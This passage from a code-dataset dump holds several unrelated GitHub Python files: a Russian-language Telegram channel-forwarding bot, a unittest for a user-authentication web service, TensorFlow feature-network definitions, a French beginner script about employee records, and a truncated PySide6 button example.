bytes\n # Если это документ или сжатая фотография\n if type(message.media) is MessageMediaPhoto:\n logger.info('{0} found compressed photo'.format(post_link))\n media_path = await message.download_media('./{0}/{1}'.format(temp_dir_name, str(uuid4())))\n logger.info('{0} downloaded compressed photo to {1}'.format(post_link, media_path))\n # media.append(os.path.basename(media_path))\n elif type(message.media) is MessageMediaDocument:\n logger.info('{0} found document'.format(post_link))\n message_size_cap -= message.media.document.size\n if message_size_cap >= 0:\n media_path = await message.download_media('./{0}/{1}'.format(temp_dir_name, str(uuid4())))\n logger.info('{0} downloaded document to {1}'.format(post_link, media_path))\n # media.append(os.path.basename(media_path))\n else:\n logger.info('{0} too big document, cancel download'.format(post_link))\n\n # Предполагаем что там только одно прикрепление и это фото или документ\n # Если превысили лимит или не получилось скачать, а файлы это фото или документ\n try:\n if (message_size_cap < 0) and \\\n (type(message.media) == MessageMediaPhoto or type(message.media) == MessageMediaDocument):\n logger.info('{0} nothing was downloaded, because media size exceeds 10 megabytes'\n .format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n '{1}'\n .format(post_link, message.message))\n logger.info('{0} sent to {1}'.format(post_link, user))\n # Если скачалось (а мы качаем только фото или документы)\n elif media_path:\n logger.info('{0} successfully downloaded all media'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_file(user, media_path, caption='{0}\\n'\n '{1}'\n .format(post_link, message.message), link_preview=False)\n logger.info('{0} 
sent to {1}'.format(post_link, user))\n # Если не скачалось и файлы не фото или документы (все остальные случаи)\n else:\n logger.info('{0} post has no media to re-upload'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n '{1}'\n .format(post_link,\n message.message), link_preview=False)\n logger.info('{0} sent to {1}'.format(post_link, user))\n # Если не получилось отослать картинки (на это мы повлиять не можем)\n except (MediaInvalidError, MediaEmptyError):\n logger.info('{0} some or all media was downloaded, but was not sent, '\n 'because some Telegram servers error'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n '{1}'\n .format(post_link, message.message))\n logger.info('{0} sent to {1}'.format(post_link, user))\n try:\n # Удаляем временную папку\n logger.info('{0} removing temporary directory'.format(post_link))\n shutil.rmtree('./{0}'.format(temp_dir_name))\n logger.info('{0} removed temporary directory'.format(post_link))\n except FileNotFoundError:\n pass\n\n # Если файлов нет\n else:\n logger.info('{0} post has no media'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n '{1}'\n .format(post_link,\n message.message), link_preview=False)\n logger.info('{0} sent to {1}'.format(post_link, user))\n\n\nasync def check_link(message):\n link = message.message\n\n if link.startswith('https://t.me/joinchat/'):\n try:\n invite = await bot_client(CheckChatInviteRequest(link.split('/')[4]))\n if type(invite) == ChatInviteAlready:\n return 'chat_ok', invite.chat\n elif type(invite) == ChatInvite:\n if invite.channel:\n updates = await bot_client(ImportChatInviteRequest(link.split('/')[4]))\n chat = updates.chats[0]\n if chat.restricted or chat.scam or chat.fake:\n await bot_client(LeaveChannelRequest(chat))\n return 'chat_bad', None\n else:\n return 'chat_ok', chat\n else:\n return 'chat_is_group', None\n except (InviteHashExpiredError, InviteHashEmptyError):\n return 'chat_expired', None\n\n elif link.startswith('https://t.me/'):\n try:\n target = await bot_client.get_entity(link)\n if target.restricted or target.scam or target.fake:\n return 'chat_bad', None\n if not target.broadcast:\n return 'chat_is_group', None\n else:\n await bot_client(JoinChannelRequest(target)) # noqa\n return 'chat_ok', target\n except ValueError:\n return 'chat_expired', None\n\n # TODO: This is totally not working but it would be a very convenient thing\n # If this is forwarded post\n # elif message.fwd_from:\n # if type(message.fwd_from.from_id) == PeerChannel:\n # target = await bot_client.get_entity(message.fwd_from.from_id)\n # if target.restricted or target.scam or target.fake:\n # return 'chat_bad', None\n # # I don't think that broadcast parameter can be applied to this\n # # because if PeerChannel then it's 100% channel not a group chat\n # if not target.broadcast:\n # return 'chat_is_group', None\n # else:\n # await bot_client(JoinChannelRequest(target))\n # return 'chat_ok', target\n # else:\n # return 'chat_expired', None\n\n else:\n return 'chat_expired', None\n\n\n@bot_bot.on(events.NewMessage())\nasync def handle_bot_input_message(event):\n user = 
event.chat\n message = event.message\n\n if message.message == '/start':\n db_set_new_user(user.id)\n await message.reply('Привет, я бот который поможет тебе создать что-то похожее на ленту новостей.\\n\\n'\n 'Я буду пересылать сюда посты из каналов на которые ты подпишешься здесь, таким образом '\n 'ты можешь проверять только диалог со мной и смотреть свежие посты из всех групп сразу, '\n 'это ли не чудо?\\n\\n'\n 'Кстати ты можешь не подписываться на канал сам, а подписаться только здесь, но я не '\n 'советую так делать, потому что каналам важен каждый подписчик! (а ещё если я буду '\n 'недоступен - постов тоже не будет)\\n\\n'\n 'Команды для управления твоими подписками:\\n'\n '/list - список подписок\\n'\n '/subscribe - подписаться на канал\\n'\n '/unsubscribe - отменить подписку на канал\\n\\n'\n '**ВАЖНО**\\n'\n 'V1.4:\\n'\n '- Теперь я могу пересылать тебе посты из **приватных каналов!**\\n'\n '- Теперь я по-другому пересылаю тебе посты - не просто отправляю ссылку на пост, а '\n '**перезаливаю пост полностью!** Это накладывает **ограничения**: '\n 'если в посте файлы больше чем можно переслать, то я отправлю что смогу, сообщу о том что '\n 'не смог переслать всё и оставлю ссылку на пост\\n'\n '- Что осталось по-старому, так это то, что я могу часто быть **недоступен** или '\n '**медленно реагировать** из-за нагрузки, '\n 'интернета в том месте где я нахожусь или просто от тяжёлой жизни\\n\\n'\n '**P.S.** Ты и так знаешь кто меня сделал, так что подумай нужна ли тут пересылка из '\n 'ВКонтакте и напиши ему в лс, конечно же в Телеграме', link_preview=False)\n\n state = db_get_user_state(user.id)\n \n if message.message == '/list':\n message_text = ''\n for idx, channel in enumerate(db_get_user_channels(user.id)):\n if channel[1] is None:\n message_text += '**{0}.** {1} (приватный)\\n'.format(idx + 1, channel[2])\n else:\n message_text += '**{0}.** [{2}](https://t.me/{1})\\n'.format(idx + 1, channel[1], channel[2])\n message_text = message_text[:-1]\n message_text = 'Понял, вот список каналов на которые ты подписан:\\n\\n' + message_text\n await message.reply(message_text, link_preview=False)\n\n elif message.message == '/subscribe':\n await message.reply('Хорошо, отправь мне ссылку на канал, она выглядит примерно так:\\n'\n 'https://t.me/{имя_канала} (для публичных каналов)\\n'\n 'или\\n'\n 'https://t.me/joinchat/{разные_буквы_и_цифры} (для приватных каналов)\\n\\n'\n '(из-за обновления API телеграма некоторые ссылки могут не работать)',\n link_preview=False)\n db_update_user_state(user.id, 'subscribe')\n\n elif message.message == '/unsubscribe':\n message_text = ''\n for idx, channel in enumerate(db_get_user_channels(user.id)):\n if channel[1] is None:\n message_text += '**{0}.** {1} (приватный)\\n'.format(idx + 1, channel[2])\n else:\n message_text += '**{0}.** [{2}](https://t.me/{1})\\n'.format(idx + 1, channel[1], channel[2])\n message_text = message_text[:-1]\n message_text = 'Окей, список каналов на которые ты подписан:\\n\\n' + message_text\n message_text += '\\n\\nОтправь номер канала от которого хочешь отписаться, если передумал - отправь любой ' \\\n '**номер которого здесь нет** или **текст**'\n await message.reply(message_text, link_preview=False)\n db_update_user_state(user.id, 'unsubscribe')\n\n elif state == 'subscribe':\n # Public channels/groups: https://t.me/{channels_username}\n # Private channels/groups: https://t.me/joinchat/{some_code}\n\n result = await check_link(message)\n\n if result[0] == 'chat_bad':\n logger.warning('{0} was trying to subscribe to bad 
channel! DO SOMETHING!'.format(user.id))\n await message.reply('Я не могу подписывать тебя на каналы, которые нарушали правила', link_preview=False)\n db_update_user_state(user.id, 'idle')\n elif result[0] == 'chat_is_group':\n await message.reply('Я не могу подписывать тебя на групповые чаты', link_preview=False)\n db_update_user_state(user.id, 'idle')\n elif result[0] == 'chat_expired':\n await message.reply('Ссылка неправильная или её срок действия истёк', link_preview=False)\n db_update_user_state(user.id, 'idle')\n elif result[0] == 'chat_ok':\n db_add_new_channel_or_user(result[1].id, result[1].username, result[1].title, user.id)\n db_update_user_state(user.id, 'idle')\n await message.reply('Готово!\\nСкоро тут начнут появляться посты из этого канала:\\n{0}'\n .format(result[1].title), link_preview=False)\n\n elif state == 'unsubscribe':\n try:\n idx = int(message.message) - 1\n if idx < 0:\n db_update_user_state(user.id, 'idle')\n await message.reply('Отмена. Все подписки остались на месте', link_preview=False)\n else:\n channel = db_get_user_channels(user.id)[idx]\n if channel[1] is None:\n reply = 'Успешная отписка от {0} (приватный)\\n'.format(channel[2])\n else:\n reply = 'Успешная отписка от [{1}](https://t.me/{0})\\n'.format(channel[1], channel[2])\n db_delete_user_from_channel(channel[0], user.id)\n db_update_user_state(user.id, 'idle')\n await message.reply(reply)\n except (ValueError, IndexError):\n db_update_user_state(user.id, 'idle')\n await message.reply('Отмена. Все подписки остались на месте', link_preview=False)\n\nwith bot_client:\n bot_client.loop.run_forever()\n","repo_name":"dimondjik/personal_telegram_newsletter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":33585,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43062174257","text":"# -*- coding: utf-8 -*-\n# @time:2019/5/5 15:05\n# Author:殇殇\n# @file:test_verifiedUserAuth.py\n# @fuction: 测试实名认证的接口\n\nimport unittest\nfrom xml.sax.saxutils import escape\nfrom ddt import ddt,data\nfrom common.do_excel import DoExcel\nfrom common.contants import *\nfrom common.do_suds import DoSuds\nfrom suds import WebFault\nfrom common.do_cardid import GetCardid\nfrom common.do_context import replace,Context\nfrom common.do_mysql import DoMysql\nimport random\nimport warnings\nfrom common.my_log import MyLog\n\nmy_log = MyLog (__name__)\n\ndo_excel = DoExcel(case_file,'verifiedUserAuth')\nverifiedUserAuth_caces = do_excel.get_data()\n\n\n@ddt\nclass VerifiedUserAuthTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n warnings.simplefilter (\"ignore\", ResourceWarning)\n my_log.info('---开始执行测试用例---')\n cls.do_suds = DoSuds ()\n cls.mysql = DoMysql ('user_db')\n cls.card = GetCardid ().gennerator ()\n\n @data(*verifiedUserAuth_caces)\n def test_verifiedUserAuth(self,case):\n global username\n my_log.info ('开始执行第{}条测试用例:{}'.format (case.case_id,case.title))\n case.data = replace (case.data)\n # 在请求之前,检查是否执行SQL语句\n if case.check_sql:\n sql = eval(case.check_sql)['sql1']\n sql_result = self.mysql.fetch_one (sql)\n auth_before = sql_result['count(Fpk_id)']\n my_log.info ('实名认证之前,数据库的数据有:{}'.format (auth_before))\n\n # 生成唯一的手机号码(将数据库中最大的手机号+1000) 发生验证码接口--normal_mobile\n if case.data.find('normal_mobile')>-1:\n sql = 'select max(Fmobile_no) from sms_db_20.t_mvcode_info_0 ;'\n max_phone = self.mysql.fetch_one(sql)\n max_phone = int(max_phone['max(Fmobile_no)'])+1000\n case.data = case.data.replace('normal_mobile',str(max_phone))\n 
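            # using (current max mobile number + 1000) keeps each test run's phone number unique in the DB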
# 注册接口 #register_mobile# 将最大的手机号 传到注册接口中\n setattr(Context,'register_mobile',str(max_phone))\n # 保证注册接口的用户名不一样 username (用户名唯一)\n if case.data.find('username')>-1:\n username = getattr(Context,'username')+str(random.randint(1,100))\n case.data = case.data.replace('username',str(username))\n setattr(Context,'username',str(username))\n\n # 将自动生成的身份证号存在card_id 中\n setattr(Context,'card_id',str(self.card))\n card_id = getattr(Context,'card_id')\n case.data = case.data.replace ('card_id', self.card)\n my_log.info('自动生成的身份证号是:{}'.format(card_id))\n\n\n try:\n result = self.do_suds.do_suds (case.method, case.url, case.data)\n print ('响应的结果是:{}'.format (result))\n self.assertEqual (case.expected, escape (result[1]))\n do_excel.write_back (case.case_id + 1, escape (result[1]), 'Pass')\n\n # 2.从user_db.t_user_info表中,查到Fuid 并替换参数化\n if escape(result[1])=='ok':\n # 1.将发送的验证码 取出来\n mobile = str(getattr(Context,'register_mobile'))\n sql = \"select Fverify_code from sms_db_20.t_mvcode_info_0 where Fmobile_no = {} \".format (mobile)\n phone_code = self.mysql.fetch_one(sql)\n phone_code = phone_code['Fverify_code']\n setattr(Context,'phone_code',str(phone_code))\n my_log.info('注册的手机号:{}'.format(mobile))\n my_log.info ('验证码:{}'.format (phone_code))\n\n # 注册功能后,查询数据库 根据用户名将Fuid 用户id取出来\n username = str(getattr(Context,'username'))\n sql = \"select Fuid from user_db.t_user_info where Fuser_id = '{}'\".format(username)\n user_id = self.mysql.fetch_one(sql)\n user_id = user_id['Fuid']\n my_log.info('查到的用户id是:{}'.format(user_id))\n setattr(Context,'user_id',str(user_id))\n\n # 在请求成功之后,检查是否执行SQL语句\n if case.check_sql:\n sql = eval(case.check_sql)['sql1']\n sql_result = self.mysql.fetch_one (sql)\n auth_after = sql_result['count(Fpk_id)']\n my_log.info ('实名认证之后,数据库的数据有:{}'.format (auth_after))\n\n except AssertionError as e:\n my_log.error ('断言失败了:{}'.format (e))\n do_excel.write_back (case.case_id + 1, escape (result[1]), 'Failed')\n raise e\n except WebFault as error:\n result = str ((error.__dict__)['fault'].faultstring)\n try:\n print ('返回结果是:{}'.format (result))\n self.assertEqual (case.expected, result)\n do_excel.write_back (case.case_id + 1, result, 'Pass')\n except AssertionError as e:\n my_log.error ('捕获断言失败:{}'.format (e))\n do_excel.write_back (case.case_id + 1, result, 'Failed')\n raise e\n\n\n @classmethod\n def tearDownClass(cls):\n cls.mysql.close()\n my_log.info('---测试用例执行结束---')\n\n\nif __name__ == '__main__':\n unittest.main()\n\n\n","repo_name":"gracesoul/python_webservice","sub_path":"testcases/test_verifiedUserAuth.py","file_name":"test_verifiedUserAuth.py","file_ext":"py","file_size_in_byte":5434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15406251980","text":"'''\nNote that all functions are modified to use e.g. cnn.slim_conv2d() instead of slim.conv2d().\nThese functions use a cnn.Tensor to keep track of the receptive field.\n\nYou should not use slim.arg_scope() to modify the internal behaviour of these functions!\n(Except through the provided e.g. 
alexnet.alexnet_v2_arg_scope().)\nThis is because a user does not know which functions are called internally.\nInstead, these functions will expose all relevant options and use arg_scope internally.\n\nWe add parameter `variables_collections`.\n\nNot yet: We add parameter `use_batch_norm`.\n'''\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nslim = tf.contrib.slim\n\nfrom seqtrack import cnn\nfrom seqtrack import helpers\n\nfrom . import util\nfrom . import alexnet as alexnet_pkg\nfrom . import vgg as vgg_pkg\nfrom . import resnet_v1 as resnet_v1_pkg\n\n\n# API of a feature function:\n# \n# Takes an image and returns an output and a series of named intermediate endpoints (tensors).\n# The intermediate endpoints may be used for multi-depth cross-correlation.\n\n# TODO: Avoid duplication of default parameters here if possible?\n\n\ndef alexnet(x, is_training, trainable=True, variables_collections=None,\n weight_decay=0,\n output_layer='conv5',\n output_act='linear',\n freeze_until_layer=None,\n padding='VALID',\n enable_bnorm=True):\n with slim.arg_scope(feature_arg_scope(\n weight_decay=weight_decay, enable_bnorm=enable_bnorm, padding=padding)):\n return _alexnet_layers(x, is_training, trainable, variables_collections,\n output_layer=output_layer,\n output_activation_fn=helpers.get_act(output_act),\n freeze_until_layer=freeze_until_layer)\n\n\ndef feature_arg_scope(weight_decay, enable_bnorm, padding):\n with slim.arg_scope(\n [cnn.slim_conv2d],\n weights_regularizer=slim.l2_regularizer(weight_decay) if weight_decay else None,\n normalizer_fn=slim.batch_norm if enable_bnorm else None):\n with slim.arg_scope([cnn.slim_conv2d, cnn.slim_max_pool2d],\n padding=padding) as arg_sc:\n return arg_sc\n\n\ndef _alexnet_layers(x, is_training, trainable=True, variables_collections=None,\n output_layer='conv5',\n output_activation_fn=None,\n freeze_until_layer=None):\n # Should is_training be disabled with trainable=False?\n with slim.arg_scope([slim.batch_norm], is_training=is_training):\n with slim.arg_scope([cnn.slim_conv2d, slim.batch_norm],\n trainable=trainable,\n variables_collections=variables_collections):\n # https://github.com/bertinetto/siamese-fc/blob/master/training/vid_create_net.m\n # https://github.com/tensorflow/models/blob/master/research/slim/nets/alexnet.py\n # x = cnn.slim_conv2d(x, 96, [11, 11], 2, scope='conv1')\n # x = cnn.slim_max_pool2d(x, [3, 3], 2, scope='pool1')\n # x = cnn.slim_conv2d(x, 256, [5, 5], scope='conv2')\n # x = cnn.slim_max_pool2d(x, [3, 3], 2, scope='pool2')\n # x = cnn.slim_conv2d(x, 384, [3, 3], scope='conv3')\n # x = cnn.slim_conv2d(x, 384, [3, 3], scope='conv4')\n # x = cnn.slim_conv2d(x, 256, [3, 3], scope='conv5',\n # activation_fn=output_activation_fn, normalizer_fn=None)\n layers = [\n ('conv1', util.partial(cnn.slim_conv2d, 96, [11, 11], 2)),\n ('pool1', util.partial(cnn.slim_max_pool2d, [3, 3], 2)),\n ('conv2', util.partial(cnn.slim_conv2d, 256, [5, 5])),\n ('pool2', util.partial(cnn.slim_max_pool2d, [3, 3], 2)),\n ('conv3', util.partial(cnn.slim_conv2d, 384, [3, 3])),\n ('conv4', util.partial(cnn.slim_conv2d, 384, [3, 3])),\n ('conv5', util.partial(cnn.slim_conv2d, 256, [3, 3])),\n ]\n return util.evaluate_until(\n layers, x, output_layer,\n output_kwargs=dict(\n activation_fn=output_activation_fn,\n normalizer_fn=None),\n freeze_until_layer=freeze_until_layer)\n\n\ndef darknet(x, is_training, trainable=True, variables_collections=None,\n weight_decay=0,\n 
output_layer='conv5',\n output_act='linear',\n freeze_until_layer=None,\n padding='VALID',\n enable_bnorm=True):\n with slim.arg_scope(feature_arg_scope(\n weight_decay=weight_decay, enable_bnorm=enable_bnorm, padding=padding)):\n return _darknet_layers(x, is_training, trainable, variables_collections,\n output_layer=output_layer,\n output_activation_fn=helpers.get_act(output_act),\n freeze_until_layer=freeze_until_layer)\n\n\ndef _darknet_layers(x, is_training, trainable=True, variables_collections=None,\n output_layer='conv5',\n output_activation_fn=None,\n freeze_until_layer=None):\n # Should is_training be disabled with trainable=False?\n with slim.arg_scope([slim.batch_norm], is_training=is_training):\n with slim.arg_scope([cnn.slim_conv2d, slim.batch_norm],\n trainable=trainable,\n variables_collections=variables_collections):\n # https://github.com/pjreddie/darknet/blob/master/cfg/darknet.cfg\n with slim.arg_scope([cnn.slim_conv2d], activation_fn=helpers.leaky_relu):\n # x = cnn.slim_conv2d(x, 16, [3, 3], 1, scope='conv1')\n # x = cnn.slim_max_pool2d(x, [3, 3], 2, scope='pool1')\n # x = cnn.slim_conv2d(x, 32, [3, 3], 1, scope='conv2')\n # x = cnn.slim_max_pool2d(x, [3, 3], 2, scope='pool2')\n # x = cnn.slim_conv2d(x, 64, [3, 3], 1, scope='conv3')\n # x = cnn.slim_max_pool2d(x, [3, 3], 2, scope='pool3')\n # x = cnn.slim_conv2d(x, 128, [3, 3], 1, scope='conv4')\n # x = cnn.slim_max_pool2d(x, [3, 3], 2, scope='pool4')\n # x = cnn.slim_conv2d(x, 256, [3, 3], 1, scope='conv5',\n # activation_fn=output_activation_fn, normalizer_fn=None)\n layers = [\n ('conv1', util.partial(cnn.slim_conv2d, 16, [3, 3], 1)),\n ('pool1', util.partial(cnn.slim_max_pool2d, [3, 3], 2)),\n ('conv2', util.partial(cnn.slim_conv2d, 32, [3, 3], 1)),\n ('pool2', util.partial(cnn.slim_max_pool2d, [3, 3], 2)),\n ('conv3', util.partial(cnn.slim_conv2d, 64, [3, 3], 1)),\n ('pool3', util.partial(cnn.slim_max_pool2d, [3, 3], 2)),\n ('conv4', util.partial(cnn.slim_conv2d, 128, [3, 3], 1)),\n ('pool4', util.partial(cnn.slim_max_pool2d, [3, 3], 2)),\n ('conv5', util.partial(cnn.slim_conv2d, 256, [3, 3], 1)),\n ]\n return util.evaluate_until(\n layers, x, output_layer,\n output_kwargs=dict(\n activation_fn=output_activation_fn,\n normalizer_fn=None),\n freeze_until_layer=freeze_until_layer)\n\n\ndef slim_alexnet_v2(x, is_training, trainable=True, variables_collections=None,\n weight_decay=0.0005,\n conv_padding='VALID',\n pool_padding='VALID',\n conv1_stride=4,\n output_layer='conv5',\n output_act='linear',\n freeze_until_layer=None):\n if not trainable:\n raise NotImplementedError('trainable not supported')\n # TODO: Support variables_collections.\n\n with slim.arg_scope(alexnet_pkg.alexnet_v2_arg_scope(\n weight_decay=weight_decay,\n conv_padding=conv_padding,\n pool_padding=pool_padding)):\n return alexnet_pkg.alexnet_v2(\n x,\n is_training=is_training,\n conv1_stride=conv1_stride,\n output_layer=output_layer,\n output_activation_fn=helpers.get_act(output_act),\n freeze_until_layer=freeze_until_layer)\n\n\ndef slim_vgg_a(x, is_training, trainable=True, variables_collections=None,\n weight_decay=0.0005,\n conv_padding='VALID',\n pool_padding='VALID',\n output_layer='conv5/conv5_2',\n output_act='linear',\n freeze_until_layer=None):\n if not trainable:\n raise NotImplementedError('trainable not supported')\n # TODO: Support variables_collections.\n\n with slim.arg_scope(vgg_pkg.vgg_arg_scope(\n weight_decay=weight_decay,\n conv_padding=conv_padding,\n pool_padding=pool_padding)):\n return vgg_pkg.vgg_a(\n x, 
is_training=is_training,\n output_layer=output_layer,\n output_activation_fn=helpers.get_act(output_act),\n freeze_until_layer=freeze_until_layer)\n\n\ndef slim_vgg_16(x, is_training, trainable=True, variables_collections=None,\n weight_decay=0.0005,\n conv_padding='VALID',\n pool_padding='VALID',\n output_layer='conv5/conv5_3',\n output_act='linear',\n freeze_until_layer=None):\n if not trainable:\n raise NotImplementedError('trainable not supported')\n # TODO: Support variables_collections.\n\n with slim.arg_scope(vgg_pkg.vgg_arg_scope(\n weight_decay=weight_decay,\n conv_padding=conv_padding,\n pool_padding=pool_padding)):\n return vgg_pkg.vgg_16(\n x, is_training=is_training,\n output_layer=output_layer,\n output_activation_fn=helpers.get_act(output_act),\n freeze_until_layer=freeze_until_layer)\n\n\ndef slim_resnet_v1_50(x, is_training, trainable=True, variables_collections=None,\n weight_decay=0.0001,\n use_batch_norm=True,\n # reuse=None,\n # scope='resnet_v1_50',\n conv_padding='VALID',\n pool_padding='VALID',\n conv1_stride=2,\n pool1_stride=2,\n num_blocks=4,\n block1_stride=2,\n block2_stride=2,\n block3_stride=2):\n if not trainable:\n raise NotImplementedError('trainable not supported')\n with slim.arg_scope(resnet_v1_pkg.resnet_arg_scope(\n weight_decay=weight_decay,\n use_batch_norm=use_batch_norm,\n pool_padding=pool_padding,\n variables_collections=variables_collections)):\n return resnet_v1_pkg.resnet_v1_50(\n x,\n is_training=is_training,\n # reuse=None,\n # scope='resnet_v1_50',\n conv_padding=conv_padding,\n conv1_stride=conv1_stride,\n pool1_stride=pool1_stride,\n num_blocks=num_blocks,\n block1_stride=block1_stride,\n block2_stride=block2_stride,\n block3_stride=block3_stride)\n\n\nNAMES = [\n 'alexnet',\n 'darknet',\n 'slim_alexnet_v2',\n 'slim_resnet_v1_50',\n 'slim_vgg_a',\n 'slim_vgg_16',\n]\n\nBY_NAME = {name: globals()[name] for name in NAMES}\n\n\ndef get_receptive_field(feature_fn):\n '''\n Args:\n feature_fn: Function that maps (image, is_training) to (image, end_points).\n '''\n graph = tf.Graph()\n with graph.as_default():\n image = tf.placeholder(tf.float32, (None, None, None, 3), name='image')\n is_training = tf.placeholder(tf.bool, (), name='is_training')\n image = cnn.as_tensor(image, add_to_set=True)\n feat, _ = feature_fn(image, is_training)\n return feat.fields[image.value]\n","repo_name":"torrvision/seqtrack","sub_path":"python/seqtrack/models/feature_nets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12263,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"3445979357","text":"Liste_hobbies = []\nListe_hobbies.append(\n {\"Name\": \"Lecture\", \"Desc\": \"lire des livres\", \"Difficulté\": 1})\nListe_hobbies.append(\n {\"Name\": \"Netflix\", \"Desc\": \"voir des trucs\", \"Difficulté\": 0})\nListe_hobbies.append(\n {\"Name\": \"Natation\", \"Desc\": \"Faire comme les poisson\", \"Difficulté\": 3})\nListe_hobbies.append(\n {\"Name\": \"cuisine\", \"Desc\": \"Faire à manger\", \"Difficulté\": 2})\nListe_hobbies.append(\n {\"Name\": \"Bricolage\", \"Desc\": \"Faire des travaux\", \"Difficulté\": 5})\n\n\nhobbies = []\nhobbies.append(Liste_hobbies[0])\nhobbies.append(Liste_hobbies[1])\n# Employees\nbob = {\n \"Name\": \"bob\",\n \"Age\": 31,\n \"hobbies\": hobbies,\n \"salary\": 2000\n}\n\nalice = {\n \"Name\": \"Alice\",\n \"Age\": 40,\n \"hobbies\": [Liste_hobbies[0],\n {\"Name\": \"Running\",\n \"Desc\": \"courir\",\n \"Difficulté\": 1},\n Liste_hobbies[3]\n 
],\n \"salary\": 2000\n}\n\njoe = {\n \"Name\": \"Joe\",\n \"Age\": 25,\n \"hobbies\": [Liste_hobbies[2],\n Liste_hobbies[4]\n ],\n \"salary\": 2000\n}\n\n# Les services\n\nmarketing = {\n \"Name\": \"Marketing\",\n \"Description\": \"tchatch\",\n \"nbr_emp\": 0,\n \"emp\": []\n}\n\nit = {\n \"Name\": \"IT\",\n \"Description\": \"tech\",\n \"nbr_emp\": 0,\n \"emp\": []\n}\n\nfinance = {\n \"Name\": \"Finance\",\n \"Description\": \"Money\",\n \"nbr_emp\": 0,\n \"emp\": []\n}\n\nit[\"emp\"].append(bob)\nit[\"emp\"].append(\n {\n \"Name\": \"Victor\",\n \"Age\": 23,\n \"hobbies\": [Liste_hobbies[3], Liste_hobbies[4]],\n \"salary\": 2000\n })\nit[\"nbr_emp\"] = len(it[\"emp\"]) # Calcul nombre d'employe du service\n\n\nmarketing[\"emp\"].append(alice)\nmarketing[\"emp\"].append(\n {\n \"Name\": \"Marry\",\n \"Age\": 25,\n \"hobbies\": [Liste_hobbies[3], Liste_hobbies[4]],\n \"salary\": 2000\n })\nmarketing[\"nbr_emp\"] = len(it[\"emp\"]) # Calcul nombre d'employe du service\n\nfinance[\"emp\"].append(joe)\nfinance[\"emp\"].append(\n {\n \"Name\": \"Kevin\",\n \"Age\": 25,\n \"hobbies\": [Liste_hobbies[3], Liste_hobbies[4]],\n \"salary\": 2000\n })\nfinance[\"nbr_emp\"] = len(it[\"emp\"]) # Calcul nombre d'employe du service\n\nListe_service = [marketing, it, finance]\n\n\n# for srv in Liste_service:\n# for emp in srv[\"emp\"]:\n# print(\"Employé : \"+emp[\"Name\"])\n# print(\"Hobbies : \")\n# print(emp[\"hobbies\"])\n# print(\"**************************\")\n\njoe[\"hobbies\"].append({\"Name\": \"surf\"})\n\n# Augmenter le salaire\nfor emp in it[\"emp\"]:\n emp[\"salary\"] += 1000\n# reduire le salaire\nfor emp in finance[\"emp\"]:\n emp[\"salary\"] -= 500\nfor emp in marketing[\"emp\"]:\n emp[\"salary\"] -= 500\n\n# Retirer Kevin et l'affecter au service marketing\nkevin = {}\nindex = 0\nfor emp in finance[\"emp\"]:\n if emp[\"Name\"] == \"Kevin\":\n kevin = emp\n finance[\"emp\"].pop(index)\n finance[\"nbr_emp\"] = len(finance[\"emp\"])\n marketing[\"emp\"].append(kevin)\n marketing[\"nbr_emp\"] = len(marketing[\"emp\"])\n break\n index += 1\n\n\nprint(\"Marketing : \")\nprint(marketing[\"nbr_emp\"])\nprint(marketing[\"emp\"])\n\nprint(\"************************\")\n\nprint(\"finance : \")\nprint(finance[\"nbr_emp\"])\nprint(finance[\"emp\"])\n\nprint(\"************************\")\n\nprint(\"IT : \")\nprint(it[\"nbr_emp\"])\nprint(it[\"emp\"])\n","repo_name":"EYassir/initiation-python","sub_path":"examples/sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"22984547047","text":"from PySide6.QtWidgets import QApplication, QMainWindow, QPushButton\nimport sys\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n # Set the window title and size\n self.setWindowTitle(\"Button Example\")\n self.setGeometry(100, 100, 300, 200)\n\n # Create the button and add it to the window\n self.button = QPushButton(\"Click Me!\", self)\n self.button.setGeometry(100, 50, 100, 50)\n\n # Add a listener to the button that prints a message to the console\n self.button.clicked.connect(self.buttonClicked)\n\n def buttonClicked(self):\n print(\"Button clicked!\")\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n 
